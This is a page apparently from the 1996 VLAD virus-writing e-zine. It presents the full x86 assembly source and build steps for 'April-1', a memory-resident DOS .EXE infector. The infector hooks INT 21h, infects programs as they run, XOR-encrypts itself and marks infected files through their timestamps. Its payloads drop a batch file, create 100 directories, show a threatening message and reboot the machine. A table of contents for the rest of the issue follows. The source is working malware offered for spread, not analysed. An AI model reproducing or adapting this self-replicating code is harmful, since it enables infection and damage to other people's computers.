Virus Labs & Distribution
VLAD AF - April-1

;                           A*P*R*I*L - 1
;                                by
;                         T o r N a d o / DC
;   Description:
;   ------------
;   -- Parasitic resident .EXE infector 
;   -- Infects on 4bh (execute) 
;   -- xor - encryption
;   -- dont infect win .exe
;   -- Saves original time / date
;   payload - 1: ( every time )
;       - 36h = get disk space ( DIR ), drop batch file ( april1st.bat )
;   payload - 2: when user change drive to A:\ and time is ( >= 55 min )
;       - draw green frame 
;       - makes 100 directory's in C:\
;       - Write message to user
;       - Reboot
;   To compile:
;   -----------
;   Tasm april-1.asm
;   Tlink april-1.obj
;   Exe2bin april-1.exe

april_1         segment
assume  cs:april_1,ds:april_1,es:april_1
org     00h

start:          call    delta

delta:          pop     bp
sub     bp,offset delta

push    ds                  
push    es
push    cs
pop     ds                  

call    xor_crypt 
jmp     short installation

;============================= Payload - 1 ===================================
april_1_batch   proc    near  

push    es bp ax bx cx si di ds dx

lea     dx,filename ; this creates our little signature!
push    ds                      
push    cs
pop     ds
mov     ah,3ch
mov     cx,1        ; read-only!
int     21h
jc      no_drop

xchg    ax,bx
mov     ah,40h
mov     cx,(drop_end - drop_start)
lea     dx,[bp + offset drop_start]
int     21h

mov     ah,3eh  ; close drop file
int     21h

no_drop:        pop     ds
jmp     exit_virus

installation:   mov     ax,7474h
int     21h

cmp     bx,'AF'                     ; AF returned in bx?
je      error_resident              ; = assume resident

cut_memory:     mov     ah,4ah                      ; find top of memory
mov     bx,0ffffh                   ; (65536)
int     21h                          

sub     bx,(codeend-start+15)/16+1  ; resize enough para's
mov     ah,4ah                      ; for virus
int     21h

mov     ah,48h                      ; allocate for virus
mov     bx,(codeend-start+15)/16
int     21h
jc      error_resident

dec     ax                          ; ax - 1 = mcb
mov     es,ax
mov     byte ptr es:[0],'Z'
mov     word ptr es:[1],8           ; dos = mcb owner
inc     ax

push    cs
pop     ds

mov     es,ax
xor     di,di
mov     cx,(codeend-start+4)/2      ; vir len
mov     si,bp
rep     movsw

hook_int21h:    xor     ax,ax
mov     ds,ax
push    ds                            
lds     ax,ds:[21h*4]                                            
mov     word ptr es:[oldint21h],ax  
mov     word ptr es:[oldint21h+2],ds
pop     ds
mov     word ptr ds:[21h*4],offset virusint21
mov     ds:[21h*4+2],es

error_resident: pop     es
pop     ds 

restore_EXE:    mov     ax,es
add     ax,10h
add     word ptr cs:[bp+csip+02h],ax
mov     sp,word ptr cs:[bp+spss]
add     ax,word ptr cs:[bp+spss+02h]
mov     ss,ax
db      0eah
csip            dd      0fff00000h
spss            dd      ?

virusint21      proc    near

cmp     ah,4bh            ; Execute!
je      infect_file

cmp     ah,0eh            ; Change drive!
je      april_dir

cmp     ah,36h            ; Get disk space!
je      april_batch

cmp     ax,7474h          ; Check if resident
jne     function21
mov     bx,'AF'           ; April Fool :)

function21:     jmp     dword ptr cs:[oldint21h]

april_batch:    jmp     april_1_batch

april_dir:      jmp     april_dir_msg

jump_out:       jmp     close

infect_file     proc    near

push    es bp ax bx cx si di ds dx

mov     ax,3d02h                ;open file
int     21h
xchg    ax,bx

push    cs
push    cs
pop     ds
pop     es

mov     ax,5700h           ;save and check time/date stamp
int     21h
push    dx
push    cx
and     cl,1fh
xor     cl,1dh           ; secs = 29 !!!
jne     read_bytes
jmp     close

read_bytes:     mov     ah,3fh            ;read 26 bytes to header
mov     cx,1ah
mov     dx,offset header 
int     21h

cmp     byte ptr header[24],'@' ; windows .EXE file ?
je      jump_out

cmp     byte ptr header,'M'     ; normal .EXE file ?
je      exe_file

jmp     close                   ; if not jump out

exe_file:       mov     ax,4202h           ;goto end of file
call    file_pointer

push    ax                  
push    es
pop     es

mov     di,offset csip       
mov     si,offset header+14h
mov     cx,2
rep     movsw
mov     si,offset header
mov     cx,2
rep     movsw

pop     ax                          ; restore ax and
mov     cx,10h
div     cx
sub     ax,word ptr [header+8h]
mov     word ptr [header+14h],dx    ; calculate CS:IP
mov     word ptr [header+16h],ax
add     ax,00h 
mov     word ptr [header+0eh],ax    ; SS:SP
mov     word ptr [header+10h],00h

write_virus:    mov     ah,2ch         ;get random number from time
int     21h
mov     word ptr ds:[encrypt_val],dx  
mov     ax,08d00h
mov     es,ax
mov     di,00h
mov     si,di
mov     cx,(codeend-start+1)/2
rep     movsw
push    es
pop     ds
xor     bp,bp

call    xor_crypt                   

mov     ah,40h                 ; write it to file
mov     cx,(codeend-start)
mov     dx,offset start
int     21h

push    cs
pop     ds

mov     ax,4202h               ; go to end of file
call    file_pointer

mov     cx,512 ;recalculate new file length in 512-byte pages
div     cx                 
inc     ax
mov     word ptr [header+2],dx
mov     word ptr [header+4],ax

mov     ax,4200h       ;go to beginning of file
call    file_pointer

mov     cx,1ah         ;write 26 bytes to file
mov     dx,offset header
mov     ah,40h
int     21h

close:          mov     ax,5701h       ;restore time/date and mark infected
pop     cx
pop     dx
or      cl,00011101b
and     cl,11111101b  ; secs = 29
int     21h

mov     ah,3eh
int     21h     

exit_virus:     pop     dx ds di si cx bx ax bp es
jmp     function21

file_pointer:   xor     cx,cx
int     21h

;============================= Payload - 2 ===================================
april_dir_msg   proc    near

push    es bp ax bx cx si di ds dx

cmp     dl,0            ; check which drive ??
je      floppy_time
jmp     exit_virus

floppy_time:    mov     ah,2ch          ; get time ?
int     21h

cmp     cl,55           ; minute >= 55 ?
jge     continue
jmp     exit_virus

continue:       mov     ax,3h           ; clear screen
int     10h             

mov     ah,0bh          ; draw green frame!
mov     bx,0eh       
int     10h          

mov     ah,2h           ; set cursor position           
mov     dh,10            
mov     dl,14           
int     10h             

mov     ah,1h           ; get rid of cursor
mov     cursor,cx       
mov     cx,2000h        
int     10h             

mov     ah,9h           ; text string to write   
push    cs
pop     ds
lea     dx,screen_msg
int     21h

mov     cx,64h     ; make 100 DIR's
create_dir:     push    cx   

mov     ah,39h              ; make SUB directory
lea     dx,directoryname    
int     21h
lea     si,directoryname+5h ; si = offset of last sign!
inc     byte ptr [si]       

pop     cx                  
loop    create_dir
db      0eah,0f0h,0ffh,0ffh,0ffh  ; Reboot!        

 db      '@echo April Fool - 1996 - if u run this ' 
 db      'batch file your HDD will burn!',00h 

filename        db      'april1st.bat',0

directoryname   db      'C:\9<IJKHLN',00h

screen_msg:     db      'April 1st.......i will now kill your HardDisk$' 


oldint21h       dd      ?
encrypt_val     dw      0
cursor          dw      ?
header          db      1ah dup(?)      ; store 26 bytes from file

logo            db "[ APRIL-1 (c) made by TorNado/[DC] in Denmark '96 ]"

xor_crypt:      mov     dx,word ptr ds:[bp+encrypt_val]
lea     si,[bp+april_1_batch]
mov     cx,(encrypt_end-april_1_batch)/2

xor_loop:       xor     word ptr ds:[si],dx         ;simple ordinary xor-loop
inc     si                          ;encryption
inc     si
loop    xor_loop

april_1         ends
end             start



ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


Butterfly Disasm
ARTICLE.2_2       Grandma Disasm
ARTICLE.2_3       Winword.Nemesis
ARTICLE.2_4       Stupid Poly guide
ARTICLE.2_5       Immortal Riot
ARTICLE.2_6       40hex
ARTICLE.2_7       Poet virus


VLAD Viruses
ARTICLE.3_2       Systa
ARTICLE.3_3       Improbability
ARTICLE.3_4       Vampire-1
ARTICLE.3_5       Prepender
ARTICLE.3_6       Futility+
ARTICLE.3_7       K-Rad


ARTICLE.4_2       Televirus
ARTICLE.4_3       Batchbug
ARTICLE.4_4       242
ARTICLE.4_5       ASMVirus
ARTICLE.4_6       NFV
ARTICLE.4_7       April-1

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